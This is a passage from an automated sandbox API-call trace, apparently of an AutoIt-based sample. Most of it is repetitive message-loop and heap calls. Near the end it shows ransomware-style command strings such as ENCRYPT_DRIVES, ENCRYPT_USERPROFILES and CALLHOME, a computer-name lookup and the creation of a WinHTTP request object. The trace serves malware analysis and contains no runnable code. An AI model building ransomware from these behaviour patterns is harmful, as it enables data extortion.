hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.532] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc5d620 | out: hHeap=0xbe0000) returned 1 [0246.532] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.532] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.532] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.532] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.532] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.532] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.532] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.532] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.532] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.532] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.532] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.532] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.532] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.532] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.532] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.532] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.533] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.533] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.533] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.533] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.533] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.533] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.533] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.533] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.533] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.533] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.533] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.533] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc5d620 | out: hHeap=0xbe0000) returned 1 [0246.533] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.533] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.533] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.533] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.533] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.533] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.533] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.534] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.534] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.534] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.534] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.534] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.534] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.534] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.534] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.534] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.534] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.534] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.534] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.534] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.534] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.534] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.534] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.535] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.535] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.535] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.535] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.535] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc5d620 | out: hHeap=0xbe0000) returned 1 [0246.535] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.535] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc5d5e0 | out: hHeap=0xbe0000) returned 1 [0246.535] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.535] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.535] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.535] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.535] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.535] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.535] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.535] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.535] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.535] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.536] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.536] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.536] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.536] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.567] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.567] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.567] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.567] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.567] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.567] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.567] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.567] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.567] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.567] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.568] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.568] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.568] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.568] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.568] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.568] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.568] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.568] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.568] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.568] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.568] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.568] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.568] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.568] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.568] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.568] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.568] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.568] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.569] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.569] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.569] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.569] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.569] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.569] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.569] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.569] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.569] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.569] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.569] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.569] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.569] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.569] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.569] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.570] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.570] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.570] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.570] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.570] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.570] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.570] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.570] CharUpperBuffW (in: lpsz="START_THE_SHOW", cchLength=0xe | out: lpsz="START_THE_SHOW") returned 0xe [0246.570] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1e050 | out: hHeap=0xbe0000) returned 1 [0246.571] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc218f8 | out: hHeap=0xbe0000) returned 1 [0246.571] CharUpperBuffW (in: lpsz="ENCRYPT_DRIVES", cchLength=0xe | out: lpsz="ENCRYPT_DRIVES") returned 0xe [0246.571] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1e050 | out: hHeap=0xbe0000) returned 1 [0246.571] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc218f8 | out: hHeap=0xbe0000) returned 1 [0246.571] CharUpperBuffW (in: lpsz="DECRYPT_DRIVES", cchLength=0xe | out: lpsz="DECRYPT_DRIVES") returned 0xe [0246.571] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1e050 | out: hHeap=0xbe0000) returned 1 [0246.571] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc218f8 | out: hHeap=0xbe0000) returned 1 [0246.571] CharUpperBuffW (in: lpsz="ENCRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="ENCRYPT_USERPROFILES") returned 0x14 [0246.571] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcff388 | out: hHeap=0xbe0000) returned 1 [0246.571] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc218f8 | out: hHeap=0xbe0000) returned 1 [0246.571] CharUpperBuffW (in: lpsz="DECRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="DECRYPT_USERPROFILES") returned 0x14 [0246.571] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcff388 | out: hHeap=0xbe0000) returned 1 [0246.571] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc218f8 | out: hHeap=0xbe0000) returned 1 [0246.571] CharUpperBuffW (in: lpsz="CALLHOME", cchLength=0x8 | out: lpsz="CALLHOME") returned 0x8 [0246.571] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1e050 | out: hHeap=0xbe0000) returned 1 [0246.571] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc218f8 | out: hHeap=0xbe0000) returned 1 [0246.572] GetComputerNameW (in: lpBuffer=0x8bf000, nSize=0x8bf31c | out: lpBuffer="XDUWTFONO", nSize=0x8bf31c) returned 1 [0246.572] CharUpperBuffW (in: lpsz="AutoIt.Error", cchLength=0xc | out: lpsz="AUTOIT.ERROR") returned 0xc [0246.572] CharUpperBuffW (in: lpsz="MyErrFunc", cchLength=0x9 | out: lpsz="MYERRFUNC") returned 0x9 [0246.572] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1e280 | out: hHeap=0xbe0000) returned 1 [0246.573] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21b88 | out: hHeap=0xbe0000) returned 1 [0246.573] CoInitialize (pvReserved=0x0) returned 0x1 [0246.573] CoUninitialize () [0246.573] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x3c) returned 0xc1b120 [0246.573] CLSIDFromProgID (in: lpszProgID="winhttp.winhttprequest.5.1", lpclsid=0xc1b138 | out: lpclsid=0xc1b138*(Data1=0x2087c2f4, Data2=0x2cef, Data3=0x4953, Data4=([0]=0xa8, [1]=0xab, [2]=0x66, [3]=0x77, [4]=0x9b, [5]=0x67, [6]=0x4, [7]=0x95))) returned 0x0 [0246.579] CoCreateInstance (in: rclsid=0xc1b138*(Data1=0x2087c2f4, Data2=0x2cef, Data3=0x4953, Data4=([0]=0xa8, [1]=0xab, [2]=0x66, [3]=0x77, [4]=0x9b, [5]=0x67, [6]=0x4, [7]=0x95)), pUnkOuter=0x0, dwClsContext=0x5, riid=0xc1b148*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8bf2c8 | out: ppv=0x8bf2c8*=0xc26c30) returned 0x0 [0246.597] WinHttpRequest:IUnknown:QueryInterface (in: This=0xc26c30, riid=0x322c9c*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, 